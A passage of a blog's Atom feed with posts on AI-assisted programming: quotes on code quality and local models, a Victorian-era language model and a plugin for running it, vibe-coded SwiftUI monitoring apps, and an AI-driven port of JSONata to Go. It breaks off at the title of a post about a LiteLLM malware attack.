    &lt;blockquote cite="https://www.greptile.com/blog/ai-slopware-future"&gt;&lt;p&gt;I want to argue that AI models will write good code because of economic incentives. Good code is cheaper to generate and maintain. Competition is high between the AI models right now, and the ones that win will help developers ship reliable features fastest, which requires simple, maintainable code. Good code will prevail, not only because we want it to (though we do!), but because economic forces demand it. Markets will not reward slop in coding, in the long-term.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.greptile.com/blog/ai-slopware-future"&gt;Soohoon Choi&lt;/a&gt;, Slop Is Not Necessarily The Future&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="slop"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Georgi Gerganov</title><link href="https://simonwillison.net/2026/Mar/30/georgi-gerganov/#atom-tag" rel="alternate"/><published>2026-03-30T21:31:02+00:00</published><updated>2026-03-30T21:31:02+00:00</updated><id>https://simonwillison.net/2026/Mar/30/georgi-gerganov/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/ggerganov/status/2038674698809102599"&gt;&lt;p&gt;Note that the main issues that people currently unknowingly face with local models mostly revolve around the harness and some intricacies around model chat templates and prompt construction. Sometimes there are even pure inference bugs. From typing the task in the client to the actual result, there is a long chain of components that atm are not only fragile - are also developed by different parties. So it's difficult to consolidate the entire stack and you have to keep in mind that what you are currently observing is with very high probability still broken in some subtle way along that chain.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/ggerganov/status/2038674698809102599"&gt;Georgi Gerganov&lt;/a&gt;, explaining why it's hard to find local models that work well with coding agents&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/georgi-gerganov"&gt;georgi-gerganov&lt;/a&gt;&lt;/p&gt;



</summary><category term="coding-agents"/><category term="generative-ai"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="georgi-gerganov"/></entry><entry><title>Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer</title><link href="https://simonwillison.net/2026/Mar/30/mr-chatterbox/#atom-tag" rel="alternate"/><published>2026-03-30T14:28:34+00:00</published><updated>2026-03-30T14:28:34+00:00</updated><id>https://simonwillison.net/2026/Mar/30/mr-chatterbox/#atom-tag</id><summary type="html">
    &lt;p&gt;Trip Venturella released &lt;a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/"&gt;Mr. Chatterbox&lt;/a&gt;, a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it in &lt;a href="https://huggingface.co/tventurella/mr_chatterbox_model"&gt;the model card&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available &lt;a href="https://huggingface.co/datasets/TheBritishLibrary/blbooks"&gt;by the British Library&lt;/a&gt;. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from nineteenth-century literature.&lt;/p&gt;
&lt;p&gt;Mr. Chatterbox's training corpus was 28,035 books, with an estimated 2.93 billion input tokens after filtering. The model has roughly 340 million parameters, roughly the same size as GPT-2-Medium. The difference is, of course, that unlike GPT-2, Mr. Chatterbox is trained entirely on historical data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Given how hard it is to train a useful LLM without using vast amounts of scraped, unlicensed data, I've been dreaming of a model like this for a couple of years now. What would a model trained on out-of-copyright text be like to chat with?&lt;/p&gt;
&lt;p&gt;Thanks to Trip we can now find out for ourselves!&lt;/p&gt;
&lt;p&gt;The model itself is tiny, at least by Large Language Model standards - just &lt;a href="https://huggingface.co/tventurella/mr_chatterbox_model/tree/main"&gt;2.05GB&lt;/a&gt; on disk. You can try it out using Trip's &lt;a href="https://huggingface.co/spaces/tventurella/mr_chatterbox"&gt;HuggingFace Spaces demo&lt;/a&gt;:&lt;/p&gt;
&lt;p style="text-align: center"&gt;&lt;img src="https://static.simonwillison.net/static/2026/chatterbox.jpg" alt="Screenshot of a Victorian-themed chatbot interface titled &amp;quot;🎩 Mr. Chatterbox (Beta)&amp;quot; with subtitle &amp;quot;The Victorian Gentleman Chatbot&amp;quot;. The conversation shows a user asking &amp;quot;How should I behave at dinner?&amp;quot; with the bot replying &amp;quot;My good fellow, one might presume that such trivialities could not engage your attention during an evening's discourse!&amp;quot; The user then asks &amp;quot;What are good topics?&amp;quot; and the bot responds &amp;quot;The most pressing subjects of our society— Indeed, a gentleman must endeavor to engage the conversation with grace and vivacity. Such pursuits serve as vital antidotes against ennui when engaged in agreeable company.&amp;quot; A text input field at the bottom reads &amp;quot;Say hello...&amp;quot; with a send button. The interface uses a dark maroon and cream color scheme." style="max-width: 80%;" /&gt;&lt;/p&gt;
&lt;p&gt;Honestly, it's pretty terrible. Talking with it feels more like chatting with a Markov chain than an LLM - the responses may have a delightfully Victorian flavor to them but it's hard to get a response that usefully answers a question.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2203.15556"&gt;2022 Chinchilla paper&lt;/a&gt; suggests a ratio of 20x the parameter count to training tokens. For a 340m model that would suggest around 7 billion tokens, more than twice the British Library corpus used here. The smallest Qwen 3.5 model is 600m parameters and that model family starts to get interesting at 2b - so my hunch is we would need 4x or more the training data to get something that starts to feel like a useful conversational partner.&lt;/p&gt;
&lt;p&gt;But what a fun project!&lt;/p&gt;
&lt;h4 id="running-it-locally-with-llm"&gt;Running it locally with LLM&lt;/h4&gt;
&lt;p&gt;I decided to see if I could run the model on my own machine using my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; framework.&lt;/p&gt;
&lt;p&gt;I got Claude Code to do most of the work - &lt;a href="https://gisthost.github.io/?7d0f00e152dd80d617b5e501e4ff025b/index.html"&gt;here's the transcript&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Trip trained the model using Andrej Karpathy's &lt;a href="https://github.com/karpathy/nanochat"&gt;nanochat&lt;/a&gt;, so I cloned that project, pulled the model weights and told Claude to build a Python script to run the model. Once we had that working (which ended up needing some extra details from the &lt;a href="https://huggingface.co/spaces/tventurella/mr_chatterbox/tree/main"&gt;Space demo source code&lt;/a&gt;) I had Claude &lt;a href="https://llm.datasette.io/en/stable/plugins/tutorial-model-plugin.html"&gt;read the LLM plugin tutorial&lt;/a&gt; and build the rest of the plugin.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/llm-mrchatterbox"&gt;llm-mrchatterbox&lt;/a&gt; is the result. Install the plugin like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first time you run a prompt it will fetch the 2.05GB model file from Hugging Face. Try that like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m mrchatterbox "Good day, sir"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or start an ongoing chat session like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm chat -m mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you don't have LLM installed you can still get a chat session started from scratch using uvx like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx --with llm-mrchatterbox llm chat -m mrchatterbox
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When you are finished with the model you can delete the cached file using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm mrchatterbox delete-model
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the first time I've had Claude Code build a full LLM model plugin from scratch and it worked really well. I expect I'll be using this method again in the future.&lt;/p&gt;
&lt;p&gt;I continue to hope we can get a useful model from entirely public domain data. The fact that Trip was able to get this far using nanochat and 2.93 billion training tokens is a promising start.&lt;/p&gt;

&lt;p id="update-31st"&gt;&lt;strong&gt;Update 31st March 2026&lt;/strong&gt;: I had missed this when I first published this piece but Trip has his own &lt;a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/"&gt;detailed writeup of the project&lt;/a&gt; which goes into much more detail about how he trained the model. Here's how the books were filtered for pre-training:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;First, I downloaded the British Library dataset split of all 19th-century books. I filtered those down to books contemporaneous with the reign of Queen Victoria—which, unfortunately, cut out the novels of Jane Austen—and further filtered those down to a set of books with an optical character recognition (OCR) confidence of .65 or above, as listed in the metadata. This left me with 28,035 books, or roughly 2.93 billion tokens for pretraining data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Getting it to behave like a conversational model was a lot harder. Trip started by trying to train on plays by Oscar Wilde and George Bernard Shaw, but found they didn't provide enough pairs. Then he tried extracting dialogue pairs from the books themselves, with poor results. The approach that worked was to have Claude Haiku and GPT-4o-mini generate synthetic conversation pairs for the supervised fine-tuning, which solved the problem but sadly, I think, dilutes the "no training inputs from after 1899" claim from the original model card.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/training-data"&gt;training-data&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/andrej-karpathy"&gt;andrej-karpathy&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/hugging-face"&gt;hugging-face&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="llm"/><category term="training-data"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="ai-ethics"/><category term="claude-code"/><category term="andrej-karpathy"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="hugging-face"/><category term="uv"/></entry><entry><title>Quoting Matt Webb</title><link href="https://simonwillison.net/2026/Mar/28/matt-webb/#atom-tag" rel="alternate"/><published>2026-03-28T12:04:26+00:00</published><updated>2026-03-28T12:04:26+00:00</updated><id>https://simonwillison.net/2026/Mar/28/matt-webb/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://interconnected.org/home/2026/03/28/architecture"&gt;&lt;p&gt;The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...]&lt;/p&gt;
&lt;p&gt;But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better.&lt;/p&gt;
&lt;p&gt;So at the bottom is really great libraries that encapsulate hard problems, with great interfaces that make the “right” way the easy way for developers building apps with them. Architecture!&lt;/p&gt;
&lt;p&gt;While I’m vibing (I call it vibing now, not coding and not vibe coding) while I’m vibing, I am looking at lines of code less than ever before, and thinking about architecture more than ever before.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://interconnected.org/home/2026/03/28/architecture"&gt;Matt Webb&lt;/a&gt;, An appreciation for (technical) architecture&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/matt-webb"&gt;matt-webb&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/definitions"&gt;definitions&lt;/a&gt;&lt;/p&gt;



</summary><category term="matt-webb"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/><category term="coding-agents"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="definitions"/></entry><entry><title>Quoting Richard Fontana</title><link href="https://simonwillison.net/2026/Mar/27/richard-fontana/#atom-tag" rel="alternate"/><published>2026-03-27T21:11:17+00:00</published><updated>2026-03-27T21:11:17+00:00</updated><id>https://simonwillison.net/2026/Mar/27/richard-fontana/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555"&gt;&lt;p&gt;FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...]&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://github.com/chardet/chardet/issues/334#issuecomment-4098524555"&gt;Richard Fontana&lt;/a&gt;, LGPLv3 co-author, weighing in on the &lt;a href="https://simonwillison.net/2026/Mar/5/chardet/"&gt;chardet relicensing situation&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="ai-ethics"/><category term="llms"/><category term="ai"/><category term="generative-ai"/><category term="ai-assisted-programming"/></entry><entry><title>Vibe coding SwiftUI apps is a lot of fun</title><link href="https://simonwillison.net/2026/Mar/27/vibe-coding-swiftui/#atom-tag" rel="alternate"/><published>2026-03-27T20:59:53+00:00</published><updated>2026-03-27T20:59:53+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vibe-coding-swiftui/#atom-tag</id><summary type="html">
    &lt;p&gt;I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be &lt;em&gt;very&lt;/em&gt; capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results.&lt;/p&gt;
&lt;p&gt;This is my second experiment with vibe coding macOS apps - the first was &lt;a href="https://simonwillison.net/2026/Feb/25/present/"&gt;this presentation app a few weeks ago&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.&lt;/p&gt;
&lt;p&gt;I’ve built two apps so far: Bandwidther, which shows me which apps are using network bandwidth, and Gpuer, which shows me what’s going on with the GPU. At Claude’s suggestion both are now menu bar icons that open a panel full of information.&lt;/p&gt;
&lt;h4 id="bandwidther"&gt;Bandwidther&lt;/h4&gt;
&lt;p&gt;I built this app first, because I wanted to see what Dropbox was doing. It looks like this:&lt;/p&gt;
&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/bandwidther/raw/main/screenshot.png"&gt;&lt;img src="https://github.com/simonw/bandwidther/raw/main/screenshot.png" alt="Screenshot of Bandwidther macOS app showing two columns: left side displays overall download/upload speeds, a bandwidth graph over the last 60 seconds, cumulative totals, internet and LAN connection counts, and internet destinations; right side shows per-process bandwidth usage sorted by rate with processes like nsurlsessiond, apsd, rapportd, mDNSResponder, Dropbox, and others listed with their individual download/upload speeds and progress bars." style="max-width: 100%;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I’ve shared &lt;a href="https://gisthost.github.io/?6e06d4724c64c10d1fc3fbe19d9c8575/index.html"&gt;the full transcript&lt;/a&gt; I used to build the first version of the app. My prompts were pretty minimal:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Show me how much network bandwidth is in use from this machine to the internet as opposed to local LAN&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(My initial curiosity was to see if Dropbox was transferring files via the LAN from my old computer or was downloading from the internet.)&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;mkdir /tmp/bandwidther and write a native Swift UI app in there that shows me these details on a live ongoing basis&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This got me the first version, which proved to me this was worth pursuing further.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;git init and git commit what you have so far&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Since I was about to start adding new features.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now suggest features we could add to that app, the goal is to provide as much detail as possible concerning network usage including by different apps&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The nice thing about having Claude suggest features is that it has a much better idea of what’s possible than I do.&lt;/p&gt;
&lt;p&gt;We had a bit of back and forth fixing some bugs, then I sent a few more prompts to get to the two column layout shown above:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;add Per-Process Bandwidth, relaunch the app once that is done&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;now add the reverse DNS feature but make sure original IP addresses are still visible too, albeit in smaller typeface&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;redesign the app so that it is wider, I want two columns - the per-process one on the left and the rest on the right&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;OK make it a task bar icon thing, when I click the icon I want the app to appear, the icon itself should be a neat minimal little thing&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The source code and build instructions are available in &lt;a href="https://github.com/simonw/bandwidther"&gt;simonw/bandwidther&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="gpuer"&gt;Gpuer&lt;/h4&gt;
&lt;p&gt;While I was building Bandwidther in one session I had another session running to build a similar tool for seeing what the GPU was doing. Here’s what I ended up with:&lt;/p&gt;
&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/gpuer/raw/main/screenshot.png"&gt;&lt;img src="https://github.com/simonw/gpuer/raw/main/screenshot.png" alt="Screenshot of the Gpuer app on macOS showing memory usage for an Apple M5 Max with 40 GPU cores. Left panel: a large orange &amp;quot;38 GB Available&amp;quot; readout showing usage of 128.0 GB unified memory, &amp;quot;Room for ~18 more large apps before pressure&amp;quot;, a warning banner reading &amp;quot;1.5 GB pushed to disk — system was under pressure recently&amp;quot;, a horizontal segmented bar chart labeled &amp;quot;Where your memory is going&amp;quot; with green, blue, and grey segments and a legend, an explanatory note about GPU unified memory, a GPU Utilization section showing 0%, and a History graph showing Available and GPU Utilization over time as line charts. Right panel: a Memory Footprint list sorted by Memory, showing process names with horizontal pink/purple usage bars and CPU percentage labels beside each entry, covering processes including Dropbox, WebKit, Virtualization, node, Claude Helper, Safari, LM Studio, WindowServer, Finder, and others." style="max-width: 100%;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529"&gt;the transcript&lt;/a&gt;. This one took even less prompting because I could use the in-progress Bandwidther as an example:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I want to know how much RAM and GPU this computer is using, which is hard because stuff on the GPU and RAM does not seem to show up in Activity Monitor&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This collected information using &lt;code&gt;system_profiler&lt;/code&gt; and &lt;code&gt;memory_pressure&lt;/code&gt; and gave me &lt;a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529/page-001.html#msg-2026-03-24T22-13-26-614Z"&gt;an answer&lt;/a&gt; - more importantly it showed me this was possible, so I said:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Look at /tmp/bandwidther and then create a similar app in /tmp/gpuer which shows the information from above on an ongoing basis, or maybe does it better&lt;/p&gt;
&lt;/blockquote&gt;
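&lt;p&gt;To illustrate the kind of probing involved, here's a minimal Python sketch of pulling a figure out of &lt;code&gt;memory_pressure&lt;/code&gt; output. The sample line and the &lt;code&gt;parse_free_percentage&lt;/code&gt; helper are assumptions for illustration, not code from the transcript:&lt;/p&gt;

```python
import re

# Hypothetical sample of a `memory_pressure` output line - an assumed
# format for illustration, not captured from the actual transcript.
SAMPLE_OUTPUT = "System-wide memory free percentage: 62%"

def parse_free_percentage(text):
    """Return the free-memory percentage as an int, or None if absent."""
    match = re.search(r"memory free percentage:\s*(\d+)%", text)
    return int(match.group(1)) if match else None

print(parse_free_percentage(SAMPLE_OUTPUT))
```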
&lt;p&gt;After a few more changes to the Bandwidther app I told it to catch up:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Now take a look at recent changes in /tmp/bandwidther - that app now uses a sys tray icon, imitate that&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This remains one of my favorite tricks for using coding agents: having them &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/hoard-things-you-know-how-to-do/#recombining-things-from-your-hoard"&gt;recombine elements&lt;/a&gt; from other projects.&lt;/p&gt;
&lt;p&gt;The code for Gpuer can be found in &lt;a href="https://github.com/simonw/gpuer"&gt;simonw/gpuer&lt;/a&gt; on GitHub.&lt;/p&gt;
&lt;h4 id="you-shouldn-t-trust-these-apps"&gt;You shouldn't trust these apps&lt;/h4&gt;
&lt;p&gt;These two apps are classic vibe coding: I don't know Swift and I hardly glanced at the code they were writing.&lt;/p&gt;
&lt;p&gt;More importantly though, I have very little experience with macOS internals such as the values these tools are measuring. I am completely unqualified to evaluate if the numbers and charts being spat out by these tools are credible or accurate!&lt;/p&gt;
&lt;p&gt;I've added warnings to both GitHub repositories to that effect.&lt;/p&gt;
&lt;p&gt;This morning I caught Gpuer reporting that I had just 5GB of memory left when that clearly wasn't the case (according to Activity Monitor). I &lt;a href="https://gisthost.github.io/?9ae12fff0fecc9a4482c9b02e8599c70/page-001.html#msg-2026-03-27T19-35-35-866Z"&gt;pasted a screenshot into Claude Code&lt;/a&gt; and it &lt;a href="https://github.com/simonw/gpuer/commit/a3cd655f5ccb274d3561e4cbfcc771b0bb7e256a"&gt;adjusted the calculations&lt;/a&gt; and the new numbers &lt;em&gt;look&lt;/em&gt; right, but I'm still not confident that it's reporting things correctly.&lt;/p&gt;
&lt;p&gt;I only shared them on GitHub because I think they're interesting as an example of what Claude can do with SwiftUI.&lt;/p&gt;
&lt;p&gt;Despite my lack of confidence in the apps themselves, I did learn some useful things from these projects:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A SwiftUI app can get a whole lot done with a single file of code - here's &lt;a href="https://github.com/simonw/gpuer/blob/main/GpuerApp.swift"&gt;GpuerApp.swift&lt;/a&gt; (880 lines) and &lt;a href="https://github.com/simonw/bandwidther/blob/main/BandwidtherApp.swift"&gt;BandwidtherApp.swift&lt;/a&gt; (1063 lines).&lt;/li&gt;
&lt;li&gt;Swift makes it easy to wrap various terminal commands in a neat UI.&lt;/li&gt;
&lt;li&gt;Claude has surprisingly good design taste when it comes to SwiftUI applications.&lt;/li&gt;
&lt;li&gt;Turning an app into a menu bar app is just a few lines of extra code as well.&lt;/li&gt;
&lt;li&gt;You don't need to open Xcode to build this kind of application!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two apps took very little time to build and have convinced me that building macOS apps in SwiftUI is a new capability I should consider for future projects.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/macos"&gt;macos&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/swift"&gt;swift&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="claude-code"/><category term="llms"/><category term="vibe-coding"/><category term="coding-agents"/><category term="macos"/><category term="swift"/><category term="generative-ai"/></entry><entry><title>We Rewrote JSONata with AI in a Day, Saved $500K/Year</title><link href="https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-tag" rel="alternate"/><published>2026-03-27T00:35:01+00:00</published><updated>2026-03-27T00:35:01+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.reco.ai/blog/we-rewrote-jsonata-with-ai"&gt;We Rewrote JSONata with AI in a Day, Saved $500K/Year&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Bit of a hyperbolic framing, but this looks like another case study of &lt;strong&gt;vibe porting&lt;/strong&gt;, this time spinning up a new custom Go implementation of the &lt;a href="https://jsonata.org"&gt;JSONata&lt;/a&gt; JSON expression language - similar in focus to jq, and heavily associated with the &lt;a href="https://nodered.org"&gt;Node-RED&lt;/a&gt; platform.&lt;/p&gt;
&lt;p&gt;As with other vibe-porting projects, the key enabling factor was JSONata's existing test suite, which helped them build the first working Go version in 7 hours and $400 of token spend.&lt;/p&gt;
&lt;p&gt;The Reco team then used a shadow deployment for a week, running the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.&lt;/p&gt;
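&lt;p&gt;The shadow-deployment pattern can be sketched in a few lines of Python - the two implementations below are stand-ins for illustration, not Reco's actual code: serve the old result, compute the new one alongside it, and record any divergence.&lt;/p&gt;

```python
# Minimal sketch of a shadow deployment: the old implementation stays
# authoritative while the new one is evaluated silently for comparison.
# Both "implementations" here are trivial stand-ins, not real JSONata.

def old_impl(expr, data):
    return data.get(expr)  # stand-in for the existing implementation

def new_impl(expr, data):
    return data.get(expr)  # stand-in for the new Go port

def shadow_eval(expr, data, mismatches):
    expected = old_impl(expr, data)    # this result is what gets served
    candidate = new_impl(expr, data)   # this result is only compared
    if candidate != expected:
        mismatches.append((expr, expected, candidate))
    return expected

mismatches = []
result = shadow_eval("name", {"name": "pelican"}, mismatches)
```

&lt;p&gt;After enough production traffic passes through with an empty mismatch log, the new implementation can be promoted with some confidence.&lt;/p&gt;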


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/go"&gt;go&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-porting"&gt;vibe-porting&lt;/a&gt;&lt;/p&gt;



</summary><category term="generative-ai"/><category term="agentic-engineering"/><category term="json"/><category term="go"/><category term="ai"/><category term="llms"/><category term="vibe-porting"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
